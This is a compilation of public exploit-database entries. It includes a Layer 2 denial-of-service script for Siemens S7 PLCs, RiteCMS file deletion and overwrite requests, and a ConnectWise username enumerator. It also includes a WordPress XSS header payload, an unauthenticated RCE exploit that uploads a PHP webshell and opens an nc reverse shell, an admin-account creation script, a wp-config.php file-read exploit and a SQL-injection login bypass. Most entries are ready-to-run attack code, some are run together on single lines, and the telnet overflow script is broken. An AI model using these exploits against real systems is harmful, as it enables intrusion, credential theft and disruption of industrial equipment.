
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs


#!/usr/bin/python3

from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner

print(Fore.RED + r"""

 ▄▄▄· ▄• ▄▌▄▄▄▄▄      • ▌ ▄ ·.  ▄▄▄· ▄▄▄▄▄      ▄▄▄   
▐█ ▀█ ███▌•██       ·██ ▐███▐█ ▀█ •██       ▀▄ █· 
▄█▀▀█ █▌▐█▌ ▐█. ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄  
▐█ ▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌ 
 ▀  ▀  ▀▀▀  ▀▀▀  ▀█▄▀▀▀  █▀▀▀ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀ 
▄▄▄▄▄▄▄▄ .▄▄▄  • ▌ ▄ ·.    ▐ ▄  ▄▄▄· ▄▄▄▄▄      ▄▄▄  
•██  ▀▄.▀·▀▄ █··██ ▐█████ •█▌▐█▐█ ▀█ •██       ▀▄ █·
 ▐█.▐▀▀▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█  ▐█. ▄█▀▄ ▐▀▀▄ 
 ▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
 ▀▀▀  ▀▀▀ .▀  ▀▀▀  █▀▀▀▀▀▀▀▀ █ ▀  ▀  ▀▀▀  ▀█▄▀.▀  ▀
                """)

# Pause so the banner is readable before the prompt appears.  The red colour
# code is never reset afterwards (no Style.RESET_ALL anywhere in the script).
time.sleep(1.5)

# Target selection: a single IPv4 address typed by the operator; no validation.

IP: str = input("Enter the IP address of the device to exploit: ")

# Resolve the target's MAC address.  scapy's getmacbyip does an ARP lookup, so
# the target has to be on the same L2 segment.  It returns None when the host
# does not answer, and that case is never checked here: the frames built in
# the sender loops would then carry src=None.

Mac = getmacbyip(IP)

# Function to send the ouput to "nothing"

def NULL():
    """Silence further console output by pointing ``sys.stdout`` at the null device.

    A fresh handle on ``os.devnull`` is opened on every call and the previously
    installed stream is simply dropped; nothing is ever restored.
    """
    sys.stdout = open(os.devnull, 'w')

# Eternal loop to produce DoS condition

def Arnold():
    """First sender loop: transmit spoofed Ethernet frames until the process is killed.

    Each frame has an all-zero destination address and the target's resolved
    MAC (``Mac``) as its source; ``NULL()`` is called after every send, so from
    the second iteration on stdout already points at the null device.  The
    loop flag is never cleared, so the function only returns if ``sendp`` raises.
    """
    keep_going = True
    while keep_going is True:
        frame = Ether(dst="00:00:00:00:00:00", src=Mac)
        sendp(frame)
        NULL()
def Sarah():
    """Second sender loop; same frame and same effect as ``Arnold``.

    The loop has no exit condition: it ends only if ``sendp`` raises.  Every
    frame carries the target's MAC as source and an all-zero destination.
    """
    while True:
        frame = Ether()
        frame.src = Mac
        frame.dst = "00:00:00:00:00:00"
        sendp(frame)
        NULL()
def Kyle():
    """Third sender loop, identical in effect to ``Arnold`` and ``Sarah``.

    Builds the same spoofed frame (src = target MAC, dst = all zeros), sends it,
    redirects stdout to the null device, and repeats forever.
    """
    running = True
    while running:
        frame = Ether()
        frame.dst, frame.src = "00:00:00:00:00:00", Mac
        sendp(frame)
        NULL()

# Arnold
# Run the first sender on a worker thread and wait for it.  Arnold() loops
# with no exit condition, so join() returns only if the thread terminates on
# an exception; the Sarah and Kyle sections below are reached only then.
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
# Redirect stdout once more (Arnold() already does this on every iteration).
NULL()

# Sarah
# Same pattern: a second sender, started and joined in turn.

SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle
# Third sender, identical to the first two.

KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
            
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.


#####################################################
# PoC to delete secretConfig.conf file in web root  #
#####################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace the current file name with the path of any file on the server via the "delete" parameter.

# Assumed there is a secretConfig.conf file in web root

PoC: parameter "delete" - to delete the secretConfig.conf file in the web root, the payload is "../secretConfig.conf"

Request:
========

GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
            
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b


################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to write). Furthermore, an attacker might leverage the capability of arbitrary file overwrite to modify existing file such as /etc/passwd or /etc/shadow if the current PHP process user is run as root.


############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################


Steps to Reproduce:

1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse.. 
4. Upload any file and tick the checkbox named "overwrite file with same name"
5. Intercept the request and replace the current file name with the path of any file on the server via the "file_name" parameter.


PoC: param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
	 param filename - with the content of "<?php phpinfo(); ?>"

Request:
========

POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream

content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"

media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"

../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"

true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"

640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"

80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------351719865731412638493510448298--
            
# Exploit Title: ConnectWise Control 19.2.24707 - Username Enumeration
# Date: 17/12/2021
# Exploit Author: Luca Cuzzolin aka czz78
# Vendor Homepage: https://www.connectwise.com/
# Version: vulnerable <= 19.2.24707
# CVE : CVE-2019-16516

# https://github.com/czz/ScreenConnect-UserEnum

from multiprocessing import Process, Queue
from statistics import mean
from urllib3 import exceptions as urlexcept
import argparse
import math
import re
import requests

class bcolors:
    """ANSI SGR escape sequences used to colour console output.

    Plain attribute constants: prefix a string with one of them and append
    ``ENDC`` to reset the terminal attributes.  ``'\\x1b'`` is the ESC byte.
    """

    HEADER = '\x1b[95m'
    OKBLUE = '\x1b[94m'
    OKCYAN = '\x1b[96m'
    OKGREEN = '\x1b[92m'
    WARNING = '\x1b[93m'
    FAIL = '\x1b[91m'
    ENDC = '\x1b[0m'
    BOLD = '\x1b[1m'
    UNDERLINE = '\x1b[4m'


headers = list()


def header_function(header_line):
    """Append one raw header line to the module-level ``headers`` list.

    Nothing in the visible part of this script calls it, and the ``headers``
    name is shadowed by a local dict inside ``process_enum``.
    """
    headers.append(header_line)


def process_enum(queue: Queue, found_queue: Queue, wordlist: list[str], url: str, payload: list[str], failstr: str, verbose: bool, proc_id: int, stop: bool, proxy: str | None) -> None:
    """Worker body run in each child process: try every name in *wordlist* against *url*.

    Results go back to the parent through two queues: ``queue`` carries
    ``(proc_id, "FOUND"|"TRIED", user)`` and ``("PERCENT", proc_id, pct)``
    tuples, ``found_queue`` only the hits.  A name is reported as FOUND when
    *failstr* (used as a regex) matches anywhere in the joined response
    headers -- the body is not inspected.

    NOTE(review): the request reads a module-level ``proxies`` name, not the
    ``proxy`` parameter, which is unused.  ``proxies`` is only assigned inside
    the ``__main__`` block of this file, so it resolves here only when the
    child inherits the parent's globals (fork start method); under spawn this
    would raise NameError, which the ``except`` below does not catch.
    """
    try:
        # Payload to dictionary: each entry is "name:value"; the literal
        # '{USER}' value marks the field that receives the candidate name.
        payload_dict = {}
        for load in payload:
            split_load = load.split(":")
            if split_load[1] != '{USER}':
                payload_dict[split_load[0]] = split_load[1]
            else:
                payload_dict[split_load[0]] = '{USER}'

        # Enumeration
        total = len(wordlist)
        for counter, user in enumerate(wordlist):
            # Fresh copy per candidate; rebinding values while iterating is
            # safe because the key set does not change.
            user_payload = dict(payload_dict)
            for key, value in user_payload.items():
                if value == '{USER}':
                    user_payload[key] = user

            # Body is assembled by hand with no URL-encoding: the fixed fields
            # are pre-encoded in __main__, but the candidate name is inserted
            # as-is, so a name containing '&' or '=' would split the form field.
            dataraw = "".join(['%s=%s&' % (key, value) for (key, value) in user_payload.items()])[:-1]
            # Local 'headers' shadows the module-level list of the same name.
            # The hard-coded Chrome 74 User-Agent is constant across every
            # request this tool makes -- a usable fingerprint for detection.
            headers={"Accept": "*/*" , "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}

            # 'proxies' is looked up as a global here (see docstring).
            req = requests.request('POST',url,headers=headers,data=dataraw, proxies=proxies)

            # Flatten the *response* headers into one string for the regex test.
            x = "".join('{}: {}'.format(k, v) for k, v in req.headers.items())

            # failstr is interpolated into a regex pattern, not matched literally.
            if re.search(r"{}".format(failstr), str(x).replace('\n','').replace('\r','')):
                queue.put((proc_id, "FOUND", user))
                found_queue.put((proc_id, "FOUND", user))
                # -s: this worker stops after its first hit.
                if stop: break
            elif verbose:
                queue.put((proc_id, "TRIED", user))
            # counter is 0-based, so the last report is (total-1)/total*100,
            # never exactly 100.
            queue.put(("PERCENT", proc_id, (counter/total)*100))

    # Only connection-level failures are handled; the worker then returns,
    # which the parent observes as a dead process.  Any other exception
    # propagates and kills the child the same way, minus the message.
    except (urlexcept.NewConnectionError, requests.exceptions.ConnectionError):
        print("[ATTENTION] Connection error on process {}! Try lowering the amount of threads with the -c parameter.".format(proc_id))


if __name__ == "__main__":
    # Arguments
    parser = argparse.ArgumentParser(description="http://example.com/Login user enumeration tool")
    parser.add_argument("url", help="http://example.com/Login")
    parser.add_argument("wordlist", help="username wordlist")
    parser.add_argument("-c", metavar="cnt", type=int, default=10, help="process (thread) count, default 10, too many processes may cause connection problems")
    parser.add_argument("-v", action="store_true", help="verbose mode")
    parser.add_argument("-s", action="store_true", help="stop on first user found")
    parser.add_argument("-p", metavar="proxy", type=str, help="socks4/5 http/https proxy, ex: socks5://127.0.0.1:9050")
    args = parser.parse_args()

    # Arguments to simple variables
    wordlist = args.wordlist
    url = args.url
    # Form fields as "name:value", already URL-encoded ('%24' is '$'); the
    # '{USER}' value marks the field each worker fills with the candidate name.
    payload = ['ctl00%24Main%24userNameBox:{USER}', 'ctl00%24Main%24passwordBox:a', 'ctl00%24Main%24ctl05:Login', '__EVENTTARGET:', '__EVENTARGUMENT:', '__VIEWSTATE:']
    verbose = args.v
    thread_count = args.c
    # Matched as a regular expression against the response *headers* by
    # process_enum; a match is what it reports as FOUND.
    failstr = "PasswordInvalid"
    stop = args.s
    proxy= args.p

    print(bcolors.HEADER + """
      __   ___  __     ___
|  | |__  |__  |__)   |__  |\ | |  | |\/|
|__| ___| |___ |  \   |___ | \| |__| |  |

ScreenConnect POC by czz78 :)

    """+ bcolors.ENDC);
    print("URL: "+url)
    print("Payload: "+str(payload))
    print("Fail string: "+failstr)
    print("Wordlist: "+wordlist)
    if verbose: print("Verbose mode")
    if stop: print("Will stop on first user found")

    # Read by process_enum as a module-level global (its 'proxy' parameter is
    # unused).  NOTE(review): that only resolves in the children when they are
    # forked from this process; with the spawn start method this block does
    # not run in the child.
    proxies = {'http': '', 'https': ''}
    if proxy:
        proxies = {'http': proxy, 'https': proxy}

    print("Initializing processes...")
    # Distribute wordlist to processes
    # NOTE: the file handle is never closed explicitly (no 'with' / close()).
    wlfile = open(wordlist, "r", encoding="ISO-8859-1")  # or utf-8
    tothread = 0
    wllist = [[] for i in range(thread_count)]
    # Round-robin split.  tothread starts at 0, so the first line lands in
    # wllist[-1] (the last bucket); the rotation is merely offset and every
    # bucket still receives an even share.
    for user in wlfile:
        wllist[tothread-1].append(user.strip())
        if (tothread < thread_count-1):
            tothread+=1
        else:
            tothread = 0

    # Start processes
    tries_q = Queue()  # progress / TRIED / FOUND messages, consumed in the loop below
    found_q = Queue()  # FOUND messages only, drained once all workers are gone
    processes = []
    percentage = []  # last reported completion per worker, indexed by proc_id
    last_percentage = 0
    for i in range(thread_count):
        p = Process(target=process_enum, args=(tries_q, found_q, wllist[i], url, payload, failstr, verbose, i, stop, proxy))
        processes.append(p)
        percentage.append(0)
        p.start()

    print(bcolors.OKBLUE + "Processes started successfully! Enumerating." + bcolors.ENDC)
    # Main process loop
    initial_count = len(processes)
    while True:
        # Read the process output queue
        # Non-blocking get: the bare except covers queue.Empty, which is the
        # normal "nothing pending" case -- but it swallows every other error too.
        try:
            oldest = tries_q.get(False)
            if oldest[0] == 'PERCENT':
                percentage[oldest[1]] = oldest[2]
            elif oldest[1] == 'FOUND':
                print(bcolors.OKGREEN + "[{}] FOUND: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
            elif verbose:
                print(bcolors.OKCYAN + "[{}] Tried: {}".format(oldest[0], oldest[2]) + bcolors.ENDC)
        except: pass

        # Calculate completion percentage and print if /10
        # mean() raises StatisticsError on an empty list, i.e. with -c 0.
        total_percentage = math.ceil(mean(percentage))
        if total_percentage % 10 == 0 and total_percentage != last_percentage:
            print("{}% complete".format(total_percentage))
            last_percentage = total_percentage

        # Pop dead processes
        # Popping while enumerating skips the element that slides into index k;
        # a dead process skipped this way is dropped on a later pass of the loop.
        for k, p in enumerate(processes):
            if p.is_alive() == False:
                processes.pop(k)

        # Terminate all processes if -s flag is present
        # Triggered by the first worker to exit for any reason (hit found, or
        # simply finished its share), not only by a FOUND message.
        if len(processes) < initial_count and stop:
            for p in processes:
                p.terminate()

        # Print results and terminate self if finished
        # The bare except doubles as the drain loop's exit on queue.Empty.
        if len(processes) == 0:
            print(bcolors.OKBLUE + "EnumUser finished, and these usernames were found:" + bcolors.ENDC)
            while True:
                try:
                    entry = found_q.get(False)
                    print(bcolors.OKGREEN + "[{}] FOUND: {}".format(entry[0], entry[2]) + bcolors.ENDC)
                except:
                    break
            quit()
            
# Exploit Title: WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: gx1 <gaetano.perrone[at]secsi.io> # Vulnerability Discovery: Gaetano Perrone # Vendor Homepage: https://www.crmperks.com/ # Software Link: https://wordpress.org/plugins/contact-form-entries/ # Version: < 1.1.7 # Tested on: any # References: * https://wpscan.com/vulnerability/acd3d98a-aab8-49be-b77e-e8c6ede171ac * https://secsi.io/blog/cve-2021-25080-finding-cross-site-scripting-vulnerabilities-in-headers/ # Description: Contact Form Entries < 1.1.7 is vulnerable to Unauthenticated Stored Cross-Site Scripting # Technical Details and Exploitation: CRM Form Entries CRM is vulnerable to a Stored XSS in Client IP field. When the user uploads a new form, CRM Form Entries checks for the client IP in order to save information about the user: =============================================================================================================== public function get_ip(), wp-content/plugins/contact-form-entries/contact-form-entries.php, line 1388 ============================================================================================================== The user can set an arbitrary "HTTP_CLIENT_IP" value, and the value is stored inside the database. # Proof Of Concept: Suppose that you have a Contact Form, intercept the POST request and insert the following Client-IP header =============================================================================================================== POST /index.php?rest_route=/contact-form-7/v1/contact-forms/10/feedback HTTP/1.1 Host: dsp.com:11080 Content-Length: 1411 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ... 
Client-IP: <img src=a onerror=alert(1)> ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" Content-Disposition: form-data; name="_wpcf7" 10 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_version" 5.3.1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_locale" en_US ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_unit_tag" wpcf7-f10-p13-o1 ------WebKitFormBoundaryCuNGXLnhRsdglEAx Content-Disposition: form-data; name="_wpcf7_container_post" ... =============================================================================================================== The request is accepted, and the code reads $_SERVER['HTTP_CLIENT_IP'], so the injected IP value is saved inside the database. When the administrator clicks on the entry element in the plugin, the XSS is triggered. # Solution: Upgrade Contact Form Entries to version 1.1.7
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS) # Discovered by: Yehia Elghaly # Discovered Date: 22/12/2021 # Vendor Homepage: https://www.accu-time.com/ # Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/ # Tested Version: 1.0 # Vulnerability Type: Buffer Overflow (DoS) Remote # Tested on OS: linux # Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow # Steps to reproduce: # 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23 # 2. - Run the Script from remote PC/IP # 3. - Telnet Crashed #!/usr/bin/env python3 import socket import sys print("#######################################################") print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #") print("# -------------------------- #") print("# BY Yehia Elghaly #") print("#######################################################") if (len(sys.argv)<2): print ("Usage: %s <Target Host> ") % sys.argv[0] print ("Example: %s 192.168.113.1 ") % sys.argv[0] exit(0) print ("\nSending Evil.......Buffer...") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((sys.argv[1], 23)) buffer = "A"*9400 s.send(" Crashed Check the connection") Print ("Crashed") except: print ("Could not connect to ACCU Time Telnet!")
# Exploit Title: Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 23/12/2021 # Exploit Author: Jeremiasz Pluta # Vendor Homepage: https://github.com/rskoolrash/Online-Admission-System # Software Link: https://github.com/rskoolrash/Online-Admission-System # Tested on: LAMP Stack (Debian 10) #!/usr/bin/python import sys import re import argparse import requests import time import subprocess print('Exploit for Online Admission System 1.0 - Remote Code Execution (Unauthenticated)') path = '/' #change me if the path to the /oas is in the root directory or another subdir class Exploit: def __init__(self, target_ip, target_port, localhost, localport): self.target_ip = target_ip self.target_port = target_port self.localhost = localhost self.localport = localport def exploitation(self): payload = """<?php system($_GET['cmd']); ?>""" payload2 = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f""" url = 'http://' + target_ip + ':' + target_port + path r = requests.Session() print('[*] Resolving URL...') r1 = r.get(url + 'documents.php') time.sleep(3) #Upload the payload file print('[*] Uploading the webshell payload...') files = { 'fpic': ('cmd.php', payload + '\n', 'application/x-php'), 'ftndoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdmdoc': ('', '', 'application/octet-stream'), 'ftcdoc': ('', '', 'application/octet-stream'), 'fdcdoc': ('', '', 'application/octet-stream'), 'fide': ('', '', 'application/octet-stream'), 'fsig': ('', '', 'application/octet-stream'), } data = {'fpicup':'Submit Query'} r2 = r.post(url + 'documents.php', files=files, allow_redirects=True, data=data) time.sleep(3) print('[*] Setting up netcat listener...') listener = subprocess.Popen(["nc", "-nvlp", self.localport]) time.sleep(3) print('[*] Spawning reverse shell...') print('[*] Watchout!') r3 = r.get(url + '/studentpic/cmd.php?cmd=' + payload2) 
time.sleep(3) if (r3.status_code == 200): print('[*] Got shell!') while True: listener.wait() else: print('[-] Something went wrong!') listener.terminate() def get_args(): parser = argparse.ArgumentParser(description='Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)') parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP') parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port') parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP') parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port') args = parser.parse_args() return args args = get_args() target_ip = args.url target_port = args.target_port localhost = args.localhost localport = args.localport exp = Exploit(target_ip, target_port, localhost, localport) exp.exploitation()
# Exploit Title: Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated) # Date: 22/12/2021 # Exploit Author: Tagoletta (Tağmaç) # Software Link: https://www.sourcecodester.com/php/15104/sentiment-based-movie-rating-system-using-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows import requests import json url = input('Url:') if not url.startswith('http://') and not url.startswith('https://'): url = "http://" + url if not url.endswith('/'): url = url + "/" Username = "tago" Password = "tagoletta" reqUrl = url + "classes/Users.php?f=save" reqHeaders = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryTagmac", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url} reqData = "------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nTago\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nLetta\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+Username+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n"+Password+"\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n1\r\n------WebKitFormBoundaryTagmac\r\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryTagmac--\r\n" resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) if resp.status_code == 200: print("Admin account created") reqUrl = url + "classes/Login.php?f=login" reqHeaders = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Origin": url } reqData = {"username": ""+Username+"", "password": ""+Password+""} resp = requests.post(reqUrl, headers=reqHeaders, data=reqData) data = json.loads(resp.text) status = data["status"] if status == "success": print("Login Successfully\nUsername:"+ Username+"\nPassword:"+Password) else: print("Exploited but not loginned") else: print("Not injectable")
# Exploit Title: WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated) # Date: 23/12/2021 # Exploit Authors: Nicole Sheinin, Liad Levy # Vendor Homepage: https://wordpress.org/plugins/seo-local-rank/ # Software Link: https://plugins.svn.wordpress.org/seo-local-rank/tags/2.2.2/ # Version: versions <= 2.2.2 # Tested on: MacOS # CVE: CVE-2021-39312 # Github repo: #!/usr/bin/env python3 import argparse, textwrap import requests import sys parser = argparse.ArgumentParser(description="Exploit The True Ranker plugin - Read arbitrary files", formatter_class=argparse.RawTextHelpFormatter) group_must = parser.add_argument_group('must arguments') group_must.add_argument("-u","--url", help="WordPress Target URL (Example: http://127.0.0.1:8080)",required=True) parser.add_argument("-p","--payload", help="Path to read [default] ../../../../../../../../../../wp-config.php", default="../../../../../../../../../../wp-config.php",required=False) args = parser.parse_args() if len(sys.argv) <= 2: print (f"Exploit Usage: ./exploit.py -h [help] -u [url]") sys.exit() HOST = args.url PAYLOAD = args.payload url = "{}/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php".format(HOST) payload = "/scripts/simple.php/{}".format(PAYLOAD) r = requests.post(url,data={'src': payload}) if r.status_code == 200: print(r.text) else: print("No exploit found")

Nettmp NNT 5.1 - SQLi Authentication Bypass

# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass # Date: 23/12/2021 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://wiki.nettemp.tk # Software Link: https://wiki.nettemp.tk # Version: nettmp NNT # Tested on: Linux (Ubuntu 20.04) Payload: username: 1' or 1=1;-- password: \ Proof of Concept: POST /index.php?id=status HTTP/1.1 Host: vuln.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 55 Origin: http://vuln.com DNT: 1 Connection: close Referer: http://vulnIP/index.php?id=status Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq Upgrade-Insecure-Requests: 1 username=1%27+or+1%3D1%3B--&password=%5C&form_login=log

AWebServer GhostBuilding 18 - Denial of Service (DoS)

